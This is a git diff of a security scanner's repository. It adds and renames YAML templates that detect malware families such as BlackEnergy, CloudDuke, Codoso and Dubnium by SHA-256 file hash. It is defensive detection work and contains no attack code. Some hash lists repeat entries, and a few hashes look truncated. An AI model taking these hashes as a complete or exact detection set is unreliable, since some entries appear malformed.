severity: info description: Detects AVBurner based on a combination of API calls used, hard-coded strings, and bytecode patterns diff --git a/file/malware/hash/backwash-malware.yaml b/file/malware/hash/backwash-malware-hash.yaml similarity index 88% rename from file/malware/hash/backwash-malware.yaml rename to file/malware/hash/backwash-malware-hash.yaml index 2ab1e9ef56..9e998264cf 100644 --- a/file/malware/hash/backwash-malware.yaml +++ b/file/malware/hash/backwash-malware-hash.yaml @@ -1,9 +1,10 @@ -id: backwash-malware +id: backwash-malware-hash info: - name: Backwash Malware - Detect + name: Backwash Malware Hash - Detect author: pussycat0x severity: info - description: CPP loader for the Backwash malware. + description: | + CPP loader for the Backwash malware. reference: - https://github.com/volexity/threat-intel/blob/main/2021/2021-12-06%20-%20XEGroup/indicators/yara.yar - https://blog.malwarebytes.com/threat-analysis/2020/07/credit-card-skimmer-targets-asp-net-sites/ diff --git a/file/malware/hash/blackenergy-driver-amdide-hash.yaml b/file/malware/hash/blackenergy-driver-amdide-hash.yaml new file mode 100644 index 0000000000..80eea4d57a --- /dev/null +++ b/file/malware/hash/blackenergy-driver-amdide-hash.yaml @@ -0,0 +1,24 @@ +id: blackenergy-driver-amdide-hash +info: + name: Blackenergy-Driver Amdide Hash - Detect + description: | + Detects the AMDIDE driver from BlackEnergy malware + reference: + - http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/ + tag: malware,blackenergy + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614'" + - "sha256(raw) == '3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2'" + - "sha256(raw) == '90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c'" + - "sha256(raw) == '97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1'" + - "sha256(raw) == '5111de45210751c8e40441f16760bf59856ba798ba99e3c9532a104752bf7bcc'" + - "sha256(raw) == 'cbc4b0aaa30b967a6e29df452c5d7c2a16577cede54d6d705ca1f095bd6d4988'" + - "sha256(raw) == '1ce0dfe1a6663756a32c69f7494ad082d293d32fe656d7908fb445283ab5fa68'" + condition: or diff --git a/file/malware/hash/blackenergy-driver-malware-hash.yaml b/file/malware/hash/blackenergy-driver-malware-hash.yaml new file mode 100644 index 0000000000..7f3f98507e --- /dev/null +++ b/file/malware/hash/blackenergy-driver-malware-hash.yaml @@ -0,0 +1,26 @@ +id: blackenergy-driver-malware-hash +info: + name: BlackEnergy Driver USBMDM Malware Hash - Detect + author: pussycat0x + severity: info + description: Auto-generated rule - detects BlackEnergy Driver USBMDM malware + reference: + - http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry + tags: malware,blackenergy + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094'" + - "sha256(raw) == 'b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a'" + - "sha256(raw) == 'edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281'" + - "sha256(raw) == 'ac13b819379855af80ea3499e7fb645f1c96a4a6709792613917df4276c583fc'" + - "sha256(raw) == '7a393b3eadfc8938cbecf84ca630e56e37d8b3d23e084a12ea5a7955642db291'" + - "sha256(raw) == '405013e66b6f137f915738e5623228f36c74e362873310c5f2634ca2fda6fbc5'" + - "sha256(raw) == '244dd8018177ea5a92c70a7be94334fa457c1aab8a1c1ea51580d7da500c3ad5'" + - "sha256(raw) == 'edcd1722fdc2c924382903b7e4580f9b77603110e497393c9947d45d311234bf'" + condition: or diff --git a/file/malware/hash/blackenergy-killdisk-malware-hash.yaml b/file/malware/hash/blackenergy-killdisk-malware-hash.yaml new file mode 100644 index 0000000000..4896d043f0 --- /dev/null +++ b/file/malware/hash/blackenergy-killdisk-malware-hash.yaml @@ -0,0 +1,22 @@ +id: blackenergy-killdisk-malware-hash +info: + name: BlackEnergy KillDisk Malware Hash - Detect + author: pussycat0x + severity: info + description: Detects KillDisk malware from BlackEnergy + reference: + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Blackenergy.yar + tags: malware,blackenergy + +file: + - extensions: + - all + + matchers: + - type: dsl + dsl: + - "sha256(raw) == '11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80'" + - "sha256(raw) == '5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6'" + - "sha256(raw) == 'c7536ab90621311b526aefd56003ef8e1166168f038307ae960346ce8f75203d'" + - "sha256(raw) == 'f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/blackenergy-ssh-malware-hash.yaml b/file/malware/hash/blackenergy-ssh-malware-hash.yaml new file mode 100644 index 0000000000..3e0f76619f --- /dev/null +++ b/file/malware/hash/blackenergy-ssh-malware-hash.yaml @@ -0,0 +1,18 @@ +id: blackenergy-ssh-malware-hash +info: + name: BlackEnergy BackdoorPass DropBear SSH Malware Hash - Detect + author: pussycat0x + severity: info + description: Detects the password of the backdoored DropBear SSH Server - BlackEnergy + reference: + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Blackenergy.yar + tags: malware,blackenergy + +file: + - extensions: + - all + + matchers: + - type: dsl + dsl: + - "sha256(raw) == '0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd'" \ No newline at end of file diff --git a/file/malware/hash/blackenergy-vbs-malware-hash.yaml b/file/malware/hash/blackenergy-vbs-malware-hash.yaml new file mode 100644 index 0000000000..56f011ddb6 --- /dev/null +++ b/file/malware/hash/blackenergy-vbs-malware-hash.yaml @@ -0,0 +1,20 @@ +id: blackenergy-vbs-malware-hash +info: + name: BlackEnergy VBS Agent Malware Hash - Detect + author: pussycat0x + severity: info + description: Detects VBS Agent from BlackEnergy Report - file Dropbearrun.vbs + reference: + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Blackenergy.yar + tags: malware,blackenergy + +file: + - extensions: + - all + + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'b90f268b5e7f70af1687d9825c09df15908ad3a6978b328dc88f96143a64af0f'" + - "sha256(raw) == '0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd'" + condition: or diff --git a/file/malware/hash/bluelight-malware.yaml b/file/malware/hash/bluelight-malware-hash.yaml similarity index 88% rename from file/malware/hash/bluelight-malware.yaml rename to file/malware/hash/bluelight-malware-hash.yaml index 4f332d37ab..2dca1ca113 100644 --- a/file/malware/hash/bluelight-malware.yaml +++ b/file/malware/hash/bluelight-malware-hash.yaml @@ -1,6 +1,6 @@ -id: bluelight-malware +id: bluelight-malware-hash info: - name: bluelight Malware - Detect + name: bluelight Malware Hash - Detect author: pussycat0x severity: info description: North Korean origin malware which uses a custom Google App for C2 communications. diff --git a/file/malware/hash/bluetermite-emdivi-malware-hash.yaml b/file/malware/hash/bluetermite-emdivi-malware-hash.yaml new file mode 100644 index 0000000000..040782d212 --- /dev/null +++ b/file/malware/hash/bluetermite-emdivi-malware-hash.yaml @@ -0,0 +1,33 @@ +id: bluetermite-emdivi-malware-hash +info: + name: Bluetermite Emdivi Malware Hash - Detect + author: pussycat0x + severity: info + reference: + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Bluetermite_Emdivi.yar + - https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/ + tags: malware,bluetermite + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24'" + - "sha256(raw) == '3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1'" + - "sha256(raw) == '6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662'" + - "sha256(raw) == '90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86'" + - "sha256(raw) == '9a351885bf5f6fec466f30021088504d96e9db10309622ed198184294717add1'" + - "sha256(raw) == 'a5be7cb1f37030c9f9211c71e0fbe01dae19ff0e6560c5aab393621f18a7d012'" + - "sha256(raw) == '9183abb9b639699cd2ad28d375febe1f34c14679b7638d1a79edb49d920524a4'" + - "sha256(raw) == '008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e'" + - "sha256(raw) == 'a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d'" + - "sha256(raw) == '008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e'" + - "sha256(raw) == '17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24'" + - "sha256(raw) == '3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1'" + - "sha256(raw) == '6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662'" + - "sha256(raw) == '90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86'" + - "sha256(raw) == 'a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/bluetermite-emdivi-sfx-hash.yaml b/file/malware/hash/bluetermite-emdivi-sfx-hash.yaml new file mode 100644 index 0000000000..05e5bb88e2 --- /dev/null +++ b/file/malware/hash/bluetermite-emdivi-sfx-hash.yaml @@ -0,0 +1,20 @@ +id: bluetermite-emdivi-sfx-hash +info: + name: Bluetermite Emdivi SFX Malware Hash - Detect + author: pussycat0x + severity: info + reference: + - https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/ + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Bluetermite_Emdivi.yar + tags: malware,bluetermite + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '7a3c81b2b3c14b9cd913692347019887b607c54152b348d6d3ccd3ecfd406196'" + - "sha256(raw) == '8c3df4e4549db3ce57fc1f7b1b2dfeedb7ba079f654861ca0b608cbfa1df0f6b'" + condition: or diff --git a/file/malware/hash/charmingcypress-malware.yaml b/file/malware/hash/charmingcypress-malware-hash.yaml similarity index 69% rename from file/malware/hash/charmingcypress-malware.yaml rename to file/malware/hash/charmingcypress-malware-hash.yaml index 8bf7abed98..954f146f87 100644 --- a/file/malware/hash/charmingcypress-malware.yaml +++ b/file/malware/hash/charmingcypress-malware-hash.yaml @@ -1,11 +1,11 @@ -id: charmingcypress-malware +id: charmingcypress-malware-hash info: - name: CharmingCypress Malware - Detect + name: CharmingCypress Malware Hash - Detect author: pussycat0x severity: info reference: - https://github.com/volexity/threat-intel/blob/main/2024/2024-02-13%20CharmingCypress/rules.yar - tags: malware + tags: malware,cypress file: - extensions: diff --git a/file/malware/hash/cheshirecat-malware-hash.yaml b/file/malware/hash/cheshirecat-malware-hash.yaml new file mode 100644 index 0000000000..351a05e2fb --- /dev/null +++ b/file/malware/hash/cheshirecat-malware-hash.yaml @@ -0,0 +1,22 @@ +id: cheshirecat-malware-hash +info: + name: CheshireCat Malware Hash - Detect + author: pussycat0x + severity: info + reference: + - https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/ + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_CheshireCat.yar + tags: malware,apt + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == 'ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300'" + - "sha256(raw) == '32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a'" + - "sha256(raw) == '63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb'" + - "sha256(raw) == 'c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532'" + condition: or diff --git a/file/malware/hash/cloudduke-malware-hash.yaml b/file/malware/hash/cloudduke-malware-hash.yaml new file mode 100644 index 0000000000..5d753b6036 --- /dev/null +++ b/file/malware/hash/cloudduke-malware-hash.yaml @@ -0,0 +1,33 @@ +id: cloudduke-malware-hash +info: + name: CloudDuke Malware Hash - Detect + author: pussycat0x + severity: info + reference: + - https://www.f-secure.com/weblog/archives/00002822.html + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Cloudduke.yar + tags: malware,apt + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" + - "sha256(raw) == '88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f'" + - "sha256(raw) == '1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7'" + - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" + - "sha256(raw) == '1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7'" + - "sha256(raw) == '88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f'" + - "sha256(raw) == 'ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46'" + - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" + - "sha256(raw) == 'ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46'" + - "sha256(raw) == 'ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145'" + - "sha256(raw) == 'a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004'" + - "sha256(raw) == '56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e'" + - "sha256(raw) == 'ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145'" + - "sha256(raw) == 'a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004'" + - "sha256(raw) == '56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/codoso-gh0st-malware.yaml b/file/malware/hash/codoso-gh0st-malware.yaml new file mode 100644 index 0000000000..976e2255a8 --- /dev/null +++ b/file/malware/hash/codoso-gh0st-malware.yaml @@ -0,0 +1,22 @@ +id: codoso-gh0st-malware +info: + name: Codoso APT Gh0st Malware Hash - Detect + author: pussycat0x + severity: info + reference: + - https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Codoso.yar + tags: malware,apt,codoso + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == 'bf52ca4d4077ae7e840cf6cd11fdec0bb5be890ddd5687af5cfa581c8c015fcd'" + - "sha256(raw) == '5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841'" + - "sha256(raw) == '7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8'" + - "sha256(raw) == 'd7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297'" + condition: or diff --git a/file/malware/hash/codoso-malware-hash.yaml b/file/malware/hash/codoso-malware-hash.yaml new file mode 100644 index 0000000000..4486e11cce --- /dev/null +++ b/file/malware/hash/codoso-malware-hash.yaml @@ -0,0 +1,26 @@ +id: codoso-malware-hash +info: + name: Codoso APT Malware Hash - Detect + author: pussycat0x + severity: info + description: | + Detects Codoso APT Malware. + reference: + - https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Codoso.yar + tags: malware,apt,codoso + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == 'ea67d76e9d2e9ce3a8e5f80ff9be8f17b2cd5b1212153fdf36833497d9c060c0'" + - "sha256(raw) == '130abb54112dd47284fdb169ff276f61f2b69d80ac0a9eac52200506f147b5f8'" + - "sha256(raw) == '3ea6b2b51050fe7c07e2cf9fa232de6a602aa5eff66a2e997b25785f7cf50daa'" + - "sha256(raw) == '02cf5c244aebaca6195f45029c1e37b22495609be7bdfcfcd79b0c91eac44a13'" + - "sha256(raw) == 'd66106ec2e743dae1d71b60a602ca713b93077f56a47045f4fc9143aa3957090'" + - "sha256(raw) == '3577845d71ae995762d4a8f43b21ada49d809f95c127b770aff00ae0b64264a3'" + condition: or diff --git a/file/malware/hash/codoso-pgv-malware-hash.yaml b/file/malware/hash/codoso-pgv-malware-hash.yaml new file mode 100644 index 0000000000..4927e17366 --- /dev/null +++ b/file/malware/hash/codoso-pgv-malware-hash.yaml @@ -0,0 +1,23 @@ +id: codoso-pgv-malware-hash +info: + name: Codoso APT PGV_PVID Malware Hash - Detect + author: pussycat0x + severity: info + description: | + Detects Codoso APT PGV_PVID Malware + reference: + - https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Codoso.yar + tags: malware,apt,codoso + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f'" + - "sha256(raw) == '13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75'" + - "sha256(raw) == 'bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe'" + - "sha256(raw) == '4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f'" \ No newline at end of file diff --git a/file/malware/hash/codoso-plugx-malware-hash.yaml b/file/malware/hash/codoso-plugx-malware-hash.yaml new file mode 100644 index 0000000000..6f28c6c836 --- /dev/null +++ b/file/malware/hash/codoso-plugx-malware-hash.yaml @@ -0,0 +1,24 @@ +id: codoso-plugx-malware-hash +info: + name: Codoso APT PlugX Malware Hash - Detect + author: pussycat0x + severity: info + description: | + Detects Codoso APT PlugX Malware. + reference: + - https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Codoso.yar + tags: malware,apt,codoso + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3'" + - "sha256(raw) == 'b9510e4484fa7e3034228337768176fce822162ad819539c6ca3631deac043eb'" + - "sha256(raw) == '74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3'" + - "sha256(raw) == '74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3'" + condition: or diff --git a/file/malware/hash/disgomoji-malware.yaml b/file/malware/hash/disgomoji-malware-hash.yaml similarity index 75% rename from file/malware/hash/disgomoji-malware.yaml rename to file/malware/hash/disgomoji-malware-hash.yaml index 422d33e3e0..13236031c7 100644 --- a/file/malware/hash/disgomoji-malware.yaml +++ b/file/malware/hash/disgomoji-malware-hash.yaml @@ -1,12 +1,12 @@ -id: disgomoji-malware +id: disgomoji-malware-hash info: - name: DISGOMOJI Malware - Detect + name: DISGOMOJI Malware Hash - Detect author: pussycat0x severity: info description: Detects DISGOMOJI modules based on strings in the ELF. reference: - https://github.com/volexity/threat-intel/blob/main/2024/2024-06-13%20DISGOMOJI/indicators/rules.yar - tags: malware + tags: malware,disgomoji file: - extensions: diff --git a/file/malware/hash/dubnium-malware-hash.yaml b/file/malware/hash/dubnium-malware-hash.yaml new file mode 100644 index 0000000000..fdfa9dcd68 --- /dev/null +++ b/file/malware/hash/dubnium-malware-hash.yaml @@ -0,0 +1,43 @@ +id: dubnium-malware-hash +info: + name: Dubnium Malware Hash - Detect + author: pussycat0x + description: | + Detects sample mentioned in the Dubnium Report + reference: + - https://goo.gl/AW9Cuu + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Dubnium.yar + tags: malware,dubnium + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" + - "sha256(raw) == 'caefcdf2b4e5a928cdf9360b70960337f751ec4a5ab8c0b75851fc9a1ab507a8'" + - "sha256(raw) == 'e0362d319a8d0e13eda782a0d8da960dd96043e6cc3500faeae521d1747576e5'" + - "sha256(raw) == 'a77d1c452291a6f2f6ed89a4bac88dd03d38acde709b0061efd9f50e6d9f3827'" + - "sha256(raw) == '16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b'" + - "sha256(raw) == '1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8'" + - "sha256(raw) == '41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf'" + - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" + - "sha256(raw) == '5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0'" + - "sha256(raw) == '839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba'" + - "sha256(raw) == 'a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9'" + - "sha256(raw) == 'bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f'" + - "sha256(raw) == 'e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b'" + - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" + - "sha256(raw) == '5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0'" + - "sha256(raw) == '839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba'" + - "sha256(raw) == '16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b'" + - "sha256(raw) == '1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8'" + - "sha256(raw) == '41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf'" + - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" + - "sha256(raw) == '5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0'" + - "sha256(raw) == 'a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9'" + - "sha256(raw) == 'bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f'" + - "sha256(raw) == 'e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b'" + condition: or diff --git a/file/malware/hash/dubnium-sshopenssl-malware-hash.yaml b/file/malware/hash/dubnium-sshopenssl-malware-hash.yaml new file mode 100644 index 0000000000..05606c7e0f --- /dev/null +++ b/file/malware/hash/dubnium-sshopenssl-malware-hash.yaml @@ -0,0 +1,25 @@ +id: dubnium-sshopenssl-malware-hash +info: + name: Dubnium Sample SSHOpenSSL Hash - Detect + author: pussycat0x + description: | + Detects sample mentioned in the Dubnium Report + reference: + - https://goo.gl/AW9Cuu + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Dubnium.yar + tags: malware,Dubnium,apt + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '6f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b'" + - "sha256(raw) == 'feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8'" + - "sha256(raw) == '41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf'" + - "sha256(raw) == 'bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f'" + - "sha256(raw) == 'a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9'" + - "sha256(raw) == 'e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b'" + condition: or diff --git a/file/malware/hash/emissary-malware-hash.yaml b/file/malware/hash/emissary-malware-hash.yaml new file mode 100644 index 0000000000..dd2cdda30a --- /dev/null +++ b/file/malware/hash/emissary-malware-hash.yaml @@ -0,0 +1,32 @@ +id: emissary-malware-hash +info: + name: Emissary APT Malware Hash - Detect + author: pussycat0x + description: | + Detect Emissary Malware - from samples A08E81B411.DAT, ishelp.dll + reference: + - http://goo.gl/V0epcf + - https://github.com/Yara-Rules/rules/blob/master/malware/APT_Emissary.yar + tags: malware,emissary,apt + +file: + extensions: + - all + + matchers: + type: dsl + dsl: + - "sha256(raw) == '9420017390c598ee535c24f7bcbd39f40eca699d6c94dc35bcf59ddf918c59ab'" + - "sha256(raw) == '70561f58c9e5868f44169854bcc906001947d98d15e9b4d2fbabd1262d938629'" + - "sha256(raw) == '0e64e68f6f88b25530699a1cd12f6f2790ea98e6e8fa3b4bc279f8e5c09d7290'" + - "sha256(raw) == '69caa2a4070559d4cafdf79020c4356c721088eb22398a8740dea8d21ae6e664'" + - "sha256(raw) == '675869fac21a94c8f470765bc6dd15b17cc4492dd639b878f241a45b2c3890fc'" + - "sha256(raw) == 'e817610b62ccd00bdfc9129f947ac7d078d97525e9628a3aa61027396dba419b'" + - "sha256(raw) == 'a8b0d084949c4f289beb4950f801bf99588d1b05f68587b245a31e8e82f7a1b8'" + - "sha256(raw) == 'acf7dc5a10b00f0aac102ecd9d87cd94f08a37b2726cb1e16948875751d04cc9'" + - "sha256(raw) == 'e21b47dfa9e250f49a3ab327b7444902e545bed3c4dcfa5e2e990af20593af6d'" + - "sha256(raw) == 'e369417a7623d73346f6dff729e68f7e057f7f6dae7bb03d56a7510cb3bfe538'" + - "sha256(raw) == '29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051'" + - "sha256(raw) == '98fb1d2975babc18624e3922406545458642e01360746870deee397df93f50e0'" + - "sha256(raw) == 'fbcb401cf06326ab4bb53fb9f01f1ca647f16f926811ea66984f1a1b8cf2f7bb'" + condition: or diff --git a/file/malware/hash/evilbamboo-malware.yaml b/file/malware/hash/evilbamboo-malware-hash.yaml similarity index 96% rename from file/malware/hash/evilbamboo-malware.yaml rename to file/malware/hash/evilbamboo-malware-hash.yaml index 8d833598eb..705f65971c 100644 --- a/file/malware/hash/evilbamboo-malware.yaml +++ b/file/malware/hash/evilbamboo-malware-hash.yaml @@ -1,6 +1,6 @@ -id: evilbamboo-malware +id: evilbamboo-malware-hash info: - name: EvilBamboo Malware - Detect + name: EvilBamboo Malware Hash - Detect author: pussycat0x severity: info description: | diff --git a/file/malware/hash/fakem-malware-hash.yaml b/file/malware/hash/fakem-malware-hash.yaml new file mode 100644 index 0000000000..7c544868af --- /dev/null +++ b/file/malware/hash/fakem-malware-hash.yaml @@ -0,0 +1,30 @@ +id: fakem-malware-hash +info: + name: FakeM_Generic Malware Hash - Detect + author: pussycat0x + severity: info + description: | + Detects FakeM malware samples + reference: + - http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/ + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_FakeM.yar + tags: malware,apt,fakem + +file: + extensions: + - all + matchers: + type: dsl + dsl: + - "sha256(raw) == '631fc66e57acd52284aba2608e6f31ba19e2807367e33d8704f572f6af6bd9c3'" + - "sha256(raw) == '3d9bd26f5bd5401efa17690357f40054a3d7b438ce8c91367dbf469f0d9bd520'" + - "sha256(raw) == '53af257a42a8f182e97dcbb8d22227c27d654bea756d7f34a80cc7982b70aa60'" + - "sha256(raw) == '4a4dfffae6fc8be77ac9b2c67da547f0d57ffae59e0687a356f5105fdddc88a3'" + - "sha256(raw) == '7bfbf49aa71b8235a16792ef721b7e4195df11cb75371f651595b37690d108c8'" + - "sha256(raw) == '12dedcdda853da9846014186e6b4a5d6a82ba0cf61d7fa4cbe444a010f682b5d'" + - "sha256(raw) == '9adda3d95535c6cf83a1ba08fe83f718f5c722e06d0caff8eab4a564185971c5'" + - "sha256(raw) == '3209ab95ca7ee7d8c0140f95bdb61a37d69810a7a23d90d63ecc69cc8c51db90'" + - "sha256(raw) == '41948c73b776b673f954f497e09cc469d55f27e7b6e19acb41b77f7e64c50a33'" + - "sha256(raw) == '53cecc0d0f6924eacd23c49d0d95a6381834360fbbe2356778feb8dd396d723e'" + - "sha256(raw) == '523ad50b498bfb5ab688d9b1958c8058f905b634befc65e96f9f947e40893e5b'" + condition: or diff --git a/file/malware/hash/flipflop-malware.yaml b/file/malware/hash/flipflop-malware-hash.yaml similarity index 90% rename from file/malware/hash/flipflop-malware.yaml rename to file/malware/hash/flipflop-malware-hash.yaml index a59d2b88a0..b466390428 100644 --- a/file/malware/hash/flipflop-malware.yaml +++ b/file/malware/hash/flipflop-malware-hash.yaml @@ -1,6 +1,6 @@ -id: flipflop-ldr-malware +id: flipflop-ldr-malware-hash info: - name: Flipflop Loader - Detect + name: Flipflop Loader Hash - Detect author: pussycat0x severity: info description: A loader for the CobaltStrike malware family, which ultimately takes the first and second bytes of an embedded file, and flips them prior to executing the resulting payload. diff --git a/file/malware/hash/furtim-malware-hash.yaml b/file/malware/hash/furtim-malware-hash.yaml new file mode 100644 index 0000000000..0b4455f568 --- /dev/null +++ b/file/malware/hash/furtim-malware-hash.yaml 